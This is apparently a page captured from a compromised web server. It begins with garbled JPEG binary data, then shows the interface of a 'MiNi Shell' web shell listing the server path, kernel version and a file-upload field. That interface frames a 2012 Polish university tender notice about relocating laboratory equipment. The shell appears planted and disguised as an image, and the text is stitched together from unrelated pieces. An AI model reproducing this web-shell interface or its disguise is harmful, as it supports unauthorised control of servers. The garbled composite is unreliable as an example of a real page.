JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120713/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120713/153215-N-2012.html

<p class="kh_header"><b>Katowice: USŁUGA W ZAKRESIE PRZENIESIENIA SPRZĘTU SPECJALISTYCZNEGO I URZĄDZEŃ
Z KATOWIC DO CHORZOWA</b><br>
<b>Numer ogłoszenia: 153215 - 2012; data zamieszczenia: 13.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Śląski w Katowicach Dział Zamówień Publicznych , ul. Bankowa 12, 40-007 Katowice, woj. śląskie, tel. 32 3592048, faks 32 3592048.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.us.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> USŁUGA W ZAKRESIE PRZENIESIENIA SPRZĘTU SPECJALISTYCZNEGO I URZĄDZEŃ
Z KATOWIC DO CHORZOWA.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest usługa w zakresie przeniesienia sprzętu specjalistycznego oraz urządzeń, z Katowic do Chorzowa oraz ich demontażu, ponownego montażu, przyłączenia i uruchomienia, której szczegółowy opis zawierają załączniki nr 2A-2C do SIWZ stanowiące Opis przedmiotu zamówienia.
2. Zamawiający dopuszcza możliwość składania ofert częściowych, zgodnie z poniższym podziałem:
część A: Demontaż, przeniesienie oraz ponowny montaż sprzętu/urządzeń zgodnie z załącznikiem nr 2A do SIWZ;
część B: Demontaż, przeniesienie oraz montaż sprzętu specjalistycznego zgodnie
z załącznikiem nr 2B do SIWZ, 
część C: Demontaż oraz montaż sprzętu specjalistycznego zgodnie
z załącznikiem nr 2B do SIWZ, 
część D: Demontaż, przeniesienie oraz montaż sprzętu specjalistycznego zgodnie
z załącznikiem nr 2B do SIWZ, 
część E: Demontaż, przeniesienie oraz montaż sprzętu specjalistycznego zgodnie
z załącznikiem nr 2B do SIWZ, 
część F: Demontaż, przeniesienie oraz montaż sprzętu specjalistycznego zgodnie
z załącznikiem nr 2B do SIWZ, 
część G: Demontaż, przeniesienie oraz montaż sprzętu specjalistycznego zgodnie
z załącznikiem nr 2B do SIWZ,
część H: Demontaż oraz montaż sprzętu specjalistycznego zgodnie
z załącznikiem nr 2B do SIWZ, 
część I: Demontaż  oraz montaż sprzętu specjalistycznego zgodnie
z załącznikiem nr 2C do SIWZ, 
część J: Demontaż, przeniesienie oraz montaż sprzętu specjalistycznego zgodnie
z załącznikiem nr 2C do SIWZ, 
część K: Demontaż oraz montaż sprzętu specjalistycznego zgodnie
z załącznikiem nr 2C do SIWZ, 
część L:  Demontaż, przeniesienie oraz montaż sprzętu specjalistycznego zgodnie
z załącznikiem nr 2C do SIWZ. 
3. W zakresie części A: 
Uwaga: pod pojęciem sprzętu/urządzeń Zamawiający rozumie wszelkie wskazane w Załączniku nr 2A do SIWZ.
1) Zakres prac obejmuje w szczególności:
a. demontaż, zapakowanie, zafoliowanie lub inne zabezpieczenie urządzeń/sprzętu w przypadku takiej konieczności,
b. zniesienie urządzeń/sprzętu do samochodu, którym zostaną przetransportowane, prawidłowe zabezpieczenie przenoszonych urządzeń/sprzętu podczas transportu, ich transport i wniesienie do docelowych, nowych pomieszczeń,
c. montaż i rozstawienie urządzeń/sprzętu w nowej lokalizacji,
d. transport samochodami wyposażonymi w szczególności w niezbędne zabezpieczenia do przewozu urządzeń/sprzętu będących przedmiotem zamówienia.
Realizacja usługi nastąpi przy udziale osób nadzorujących, wskazanych przez Zamawiającego w Załączniku 2A do SIWZ. 
2) Wykonawca zobowiązany jest w szczególności do:
a. realizacji usługi w sposób płynny, bez zbędnych przestojów, 
b. dostarczenia odpowiedniej ilości wytrzymałych pudeł/pojemników, oraz folii zabezpieczającej, taśm, sznurków etc., niezbędnych do prawidłowej realizacji zamówienia, 
c. demontażu, o ile jest to konieczne  (przy udziale wskazanych osób nadzorujących ze strony Zamawiającego) elementów sprzętu/urządzeń oraz odpowiedniego ich zabezpieczenia w czasie transportu,
d. pakowania sprzętu/urządzeń w obecności wskazanych osób nadzorujących ze strony Zamawiającego, 
e. załadunku, w obecności wskazanych osób nadzorujących ze strony Zamawiającego do środków transportu przystosowanych do przewożenia poszczególnych kategorii sprzętów/urządzeń,
f. bezpośredniego przetransportowania, rozładunku i przeniesienia sprzętu/urządzeń
do odpowiednich pomieszczeń w obecności osób nadzorujących ze strony Zamawiającego,
g. zabezpieczenia  sprzętu/urządzeń w taki sposób, aby nie uległy zniszczeniu czy uszkodzeniu wskutek transportu, a także warunków atmosferycznych,
h. montażu, o ile jest to konieczne, zdemontowanych na czas transportu elementów sprzętu/urządzeń i ich ustawienia w wyznaczonych przez Zamawiającego miejscach,
i. skutecznego zabezpieczenia np. wind, ciągów komunikacyjnych, oraz pomieszczeń przed zniszczeniem, uszkodzeniem  podczas  realizacji umowy, 
j. ubezpieczenie powierzonego mienia na czas demontażu, załadunku, transportu, rozładunku i montażu, 
k. dbania o ład i porządek w czasie realizacji umowy. Wykonawca odpowiada za wszelkie zniszczenia i zabrudzenia obiektu, spowodowane wykonywaniem przedmiotu zamówienia. Wykonawca naprawi uszkodzenia, powstałe podczas przeprowadzki i doprowadzi do stanu pierwotnego na własny koszt, pod nadzorem Zamawiającego,
l. zapewnienia odpowiedniej liczby pracowników, sprzętu, narzędzi i środków transportu, w tym samochodów z zamkniętą skrzynią ładunkową np. kontenerową,
m. nadzoru nad sprzętem i urządzeniami znajdującymi się w samochodzie. Niedopuszczalne jest pozostawienie załadowanego samochodu bez dozoru osoby odpowiedzialnej za przewożone mienie ze strony Wykonawcy,
n. zapewnienia imiennych identyfikatorów swoim pracownikom, zgodnie z wcześniej przedstawioną Zamawiającemu imienną listą,
o. wykonywania przedmiotu zamówienia w taki sposób, aby powierzone urządzenia/sprzęt  nie uległy zniszczeniu, utracie lub zdekompletowaniu,
p. wykonywania przedmiotu zamówienia zgodnie z przepisami prawa, a w szczególności BHP i ppoż.,
q. wykonywania przedmiotu zamówienia zgodnie z wytycznymi i wskazaniami Zamawiającego.
4. W zakresie części B-L:
1) Zakres zamówienia obejmuje w szczególności demontaż, pakowanie i przygotowanie sprzętu do transportu wraz z jego zabezpieczeniem na czas transportu oraz, w zakresie części B, E, F, G, J, L jego transport z Instytutu Fizyki, ul. Uniwersytecka 4, Katowice, w zakresie części D: Instytutu Nauki
o Materiałach, ul. Bankowa 14, Katowice (dalej: dotychczasowa lokalizacja), a także rozładunek, wniesienie sprzętu (o ile w opisie przedmiotu zamówienia nie wskazano inaczej), oraz jego montaż, przyłączenie i uruchomienie w pomieszczeniach Śląskiego Międzyuczelnianego Centrum Edukacji
i Badań Interdyscyplinarnych w Chorzowie, ul. 75 Pułku Piechoty 1 (dalej: miejsca docelowe) a także inne czynności w zakresie danej części, opisane w załącznikach nr 2B oraz 2C. Szczegółowy wykaz pomieszczeń oraz sprzętu, który zostanie przeniesiony w ramach niniejszej usługi znajduje się
w załącznikach nr 2B oraz 2C do niniejszej SIWZ. 
2) Montaż, przyłączenie i uruchomienie sprzętu polegać będzie na dokonaniu wszelkich czynności niezbędnych do funkcjonowania sprzętu, zgodnie z jego przeznaczeniem tak, aby sprzęt zachował wszelkie cechy i właściwości umożliwiające jego pracę w nowym miejscu bez zmiany, w tym pogorszenia jego funkcjonalności. 
3)Zamawiający wymaga, aby w zakresie części C-L demontaż, ponowny montaż, przyłączenie oraz uruchomienie sprzętu zostały przeprowadzone przez oficjalnego partnera producenta sprzętu.
4) Podstawą przystąpienia do realizacji przedmiotu umowy w zakresie danej części jest protokół przekazania sprzętu podpisany przez przedstawiciela Wykonawcy oraz użytkownika.
5) Wykonawca, realizując przedmiotowe zamówienie, zobowiązany będzie do:
a. oględzin sprzętu przed demontażem, potwierdzonych wpisaniem do protokołu przekazania sprzętu informacji o stanie technicznym sprzętu w chwili oględzin, podpisanego przez użytkownika i Wykonawcę, 
b. przygotowania sprzętu do demontażu i jego zdemontowania,
c. przygotowania zdemontowanego sprzętu do wyniesienia z zajmowanych pomieszczeń, w szczególności jego zabezpieczenia przed uszkodzeniem, 
d. transportu sprzętu z dotychczasowej lokalizacji w miejsce docelowe pod stałym nadzorem przedstawiciela Wykonawcy . Zapis ten nie dotyczy części C, H, I, K niniejszego postępowania,
e. montażu, podłączenia sprzętu do niezbędnych mediów oraz uruchomienia sprzętu w miejscu docelowym,
f. podjęcia innych, niezbędnych czynności wymaganych do prawidłowego uruchomienia sprzętu, w tym: czyszczenia elementów sprzętu, kalibracji, 
g. zapewnienia części niezbędnych do przeprowadzenia ponownego montażu, podłączenia sprzętu do niezbędnych mediów oraz jego uruchomienia, w szczególności: kabli, przewodów wodnych, złączek, zaworów.
h. sprawdzenia poprawności działania sprzętu po dokonanym jego montażu, podłączeniu oraz uruchomieniu,
i. wykonywania przedmiotu umowy w taki sposób, aby sprzęt nie uległ uszkodzeniu, zniszczeniu, utracie lub zdekompletowaniu,
j. uporządkowania dotychczasowej lokalizacji oraz miejsca docelowego.
UWAGA: W zakresie części C, H, I transport sprzętu zostanie zrealizowany przez Zamawiającego. 
W zakresie części L, Wykonawca zobowiązany będzie do demontażu, przeniesienia oraz ponownego montażu urządzenia wskazanego w tej części, a także transportu urządzenia wskazanego w części K postępowania. 
5. W ramach wszystkich części Zamawiający wymaga, aby Wykonawca udzielił gwarancji, nie krótszej niż 3 miesiące obejmującej wykonany montaż oraz uruchomienie sprzętu. Okres gwarancji rozpoczyna się z chwilą podpisania protokołu odbioru.
6. Wymagany termin i sposób realizacji zamówienia: umowa w danej części zostanie zawarta na czas nie dłuższy niż 4 miesiące, przy czym maksymalny czas wykonania danej usługi wynosi (z wyłączeniem cz. G):
1) w zakresie części A: 2 tygodnie od daty powiadomienia Wykonawcy o gotowości Zamawiającego,
2) w zakresie części B: 4 tygodnie od daty powiadomienia Wykonawcy o gotowości Zamawiającego,
3) w zakresie części C: 6 tygodni od daty powiadomienia Wykonawcy o gotowości Zamawiającego, 
4) w zakresie części D: 3 tygodnie od daty powiadomienia Wykonawcy o gotowości Zamawiającego, 
5) w zakresie części E: 5 tygodni od daty powiadomienia Wykonawcy o gotowości Zamawiającego,
6) w zakresie części F:  4 miesiące od daty zawarcia umowy,
7) w zakresie części G: 6 miesięcy od daty zawarcia umowy.
8) w zakresie części H-L: 4 tygodnie od daty powiadomienia Wykonawcy o gotowości Zamawiającego. 
7. Wykonawca, w ramach realizacji przedmiotu zamówienia zobowiązany będzie do:
1) zawarcia polisy ubezpieczenia odpowiedzialności cywilnej deliktowej i kontraktowej z tytułu prowadzonej działalności z zakresem ubezpieczenia zgodnym z przedmiotem zamówienia
na okres realizacji umowy, o którym mowa w pkt 4 na sumę gwarancyjną co najmniej:
a. w zakresie części A: 500.000,00 PLN, 
b. w zakresie części B: 20.000,00 PLN,
c. w zakresie części C: 700.000,00 PLN,
d. w zakresie części D: 100.000,00 PLN,
e. w zakresie części E: 1.200.000,00 PLN
f. w zakresie części F: 850.000,00 PLN,
g. w zakresie części G: 80.000,00 PLN,
h. w zakresie części H:  900.000,00 PLN,
i. w zakresie części I:  550.000,00 PLN,
j. w zakresie części J:  500.000,00 PLN,
k. w zakresie części K:  1.130.000,00 PLN,
l. w zakresie części L:  5.000.000,00 PLN,
na jedno i wszystkie zdarzenia w okresie ubezpieczenia. 
2) ubezpieczenia  sprzętu na czas jego transportu z jego dotychczasowego miejsca lokalizacji w miejsce nowej lokalizacji na rzecz Zamawiającego na zasadach ubezpieczenia ładunku w transporcie krajowym w pełnym zakresie, tj. z ryzykiem kradzieży i rabunku wraz z rozszerzeniem o ryzyko załadunku i rozładunku na kwotę co najmniej:
a. w zakresie części A: 500.000,00 PLN,
b.w zakresie części B: 20.000,00 PLN,
c. w zakresie części D: 100.000,00 PLN,
d. w zakresie części E: 1.200.000,00 PLN
e. w zakresie części F: 850.000,00 PLN,
f. w zakresie części G: 80.000,00 PLN,
g. w zakresie części J: 500.000,00 PLN,
h. w zakresie części L: 5.000.000,00 PLN.
8. Zamawiający, w celu ułatwienia przygotowania oferty przetargowej, umożliwia Wykonawcom przeprowadzenie wizji lokalnej pomieszczeń, w których obecnie znajduje się sprzęt oraz urządzenia, a także pomieszczenia, w którym zostanie zamontowany po przewiezieniu. Pomieszczenia będą udostępniane w dni robocze w godzinach 9:00-14:00, na wniosek Wykonawcy złożony do Zamawiającego w formie pisemnej bądź faksem na adres określony w rozdziale VII ust. 11 SIWZ, przed upływem terminu składania ofert. Zamawiający wyznaczy termin, w jakim będzie możliwe dokonanie wizji oraz powiadomi o tym Wykonawcę.
9.Zamawiający nie dopuszcza możliwości składania ofert wariantowych.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 63.00.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 12.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie konkretyzuje powyższego warunku poprzez stworzenie opisu sposobu dokonywania oceny jego spełniania. Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca złoży oświadczenie
o spełnieniu warunków udziału w postępowaniu, o którym mowa
w rozdziale IV ust. 1 pkt 1) SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie części A:
Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże
iż posiada wiedzę i doświadczenie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie, w wykonaniu co najmniej dwóch usług o wartości 10.000,00 PLN brutto każda, polegających na przewiezieniu  sprzętu technicznego i/lub urządzeń elektronicznych i/lub aparatury delikatnej
z obiektu do obiektu drogowym środkiem transportu. 
Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu,
o którym mowa w rozdziale IV ust.1 pkt 1) SIWZ oraz dokumenty wymienione w rozdziale IV ust. 1 pkt 2) SIWZ.
Jeżeli Wykonawca na potwierdzenie spełniania warunku udziału
w postępowaniu dotyczącego posiadania wiedzy i doświadczenia wykaże się realizacją dostaw, których wartości wyrażone zostaną w walucie innej niż PLN, Zamawiający w celu dokonania oceny spełniania warunku udziału w postępowaniu dokona przeliczenia wskazanych wartości według średniego kursu NBP z dnia publikacji ogłoszenia o zamówieniu.

W zakresie części B-L:
Zamawiający nie konkretyzuje powyższego warunku poprzez stworzenie opisu sposobu dokonywania oceny jego spełniania. Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca złoży oświadczenie
o spełnieniu warunków udziału w postępowaniu, o którym mowa
w rozdziale IV ust. 1 pkt 1) SIWZ.
Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu,
o którym mowa w rozdziale IV ust.1 pkt 1) SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie konkretyzuje powyższego warunku poprzez stworzenie opisu sposobu dokonywania oceny jego spełniania. Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca złoży oświadczenie
o spełnieniu warunków udziału w postępowaniu, o którym mowa
w rozdziale IV ust. 1 pkt 1) SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie konkretyzuje powyższego warunku poprzez stworzenie opisu sposobu dokonywania oceny jego spełniania. Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca złoży oświadczenie
o spełnieniu warunków udziału w postępowaniu, o którym mowa
w rozdziale IV ust. 1 pkt 1) SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie konkretyzuje powyższego warunku poprzez stworzenie opisu sposobu dokonywania oceny jego spełniania. Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca złoży oświadczenie
o spełnieniu warunków udziału w postępowaniu, o którym mowa
w rozdziale IV ust. 1 pkt 1) SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W zakresie części C-L:
Oświadczenie, iż demontaż, ponowny montaż oraz uruchomienie sprzętu zostaną przeprowadzone przez oficjalnego partnera producenta sprzętu.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Informacja o działalności  gospodarczej wygenerowana  z Centralnej Ewidencji i Informacji Działalności Gospodarczej (CEIDG) - składa Wykonawca będący osoba fizyczną prowadzącą działalność gospodarczą  (zalecane).
2. Pełnomocnictwo - wymagane jeżeli oferta jest podpisana przez pełnomocnika (z wyłączeniem prokurenta), nawet jeżeli jest on ujawniony w dokumencie rejestrowym.
W razie wątpliwości co do ważności lub zakresu posiadanego pełnomocnictwa Zamawiający zastrzega sobie prawo do żądania potwierdzenia pełnomocnictwa przez Wykonawcę.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zmiana treści zawartej umowy może nastąpić wyłącznie w granicach unormowania art. 144 ust.1 ustawy
z dnia 29 stycznia 2004 r. Prawo zamówień publicznych i pod rygorem nieważności wymaga formy pisemnego aneksu skutecznego po podpisaniu przez obie Strony.
2.	Zamawiający może wyrazić zgodę na dokonanie istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, wyłącznie w sytuacji: 
1) zmiany cen w przypadku, kiedy zmiana ta będzie korzystna dla Zamawiającego tzn. na cenę niższą, na pisemny wniosek jednej ze Stron, 
2) zmiany terminów umownych, w sytuacji uzasadnionej, gdy brak możliwości dochowania pierwotnego terminu wynika z przyczyn niezawinionych przez Wykonawcę. Wykonawca na piśmie przedstawi okoliczności uniemożliwiające dochowanie terminu wynikającego z oferty,
